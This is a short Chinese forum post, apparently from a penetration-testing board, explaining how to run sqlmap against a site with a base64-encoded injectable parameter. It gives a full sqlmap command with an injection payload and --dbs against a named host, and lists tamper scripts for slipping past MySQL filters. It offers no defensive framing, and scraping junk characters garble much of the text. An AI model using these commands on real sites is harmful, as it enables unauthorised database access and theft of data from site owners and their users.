| WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢? sqlmap的tamper里有个base64encode.py 使用如下. ~4 M+ N: J- G' u$ L9 s: L 1 [3 r& a, ~& Z4 }" d0 _. H! K sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs! y% _6 V" W/ _: h, N3 p a- a L$ c" J, x3 \ sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”8 B" v2 U, ]* J1 t; u- p 9 a# Z' S- r; {/ l: h+ F 其中常用到的bypass脚本绕过SQLMAP主要两个脚本:- b: `3 ?: u7 `" l9 z# t; K o9 G) \+ s# K. G" V* c9 y6 T space2hash.py ,对于MYSQL数据库 4.0, 5.0注入 space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入( ~6 F( G& F9 G1 C 首先确定目标数据库版本,然后选择相应的脚本。5 F- Z5 E. [) d2 H4 T0 t6 u -v 3 --batch --tamper "space2hash.py" 还有其他一些插件:- K' N! f4 G$ S encodes编码 ——charencode.py base64编码 —— base64encode.py* D2 {. @" u2 W' c' O 替换空格和关键字 —— halfversionedmorekeywords.py6 D# i! ?+ p! f9 `8 }% U7 q$ l; e$ \ |
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |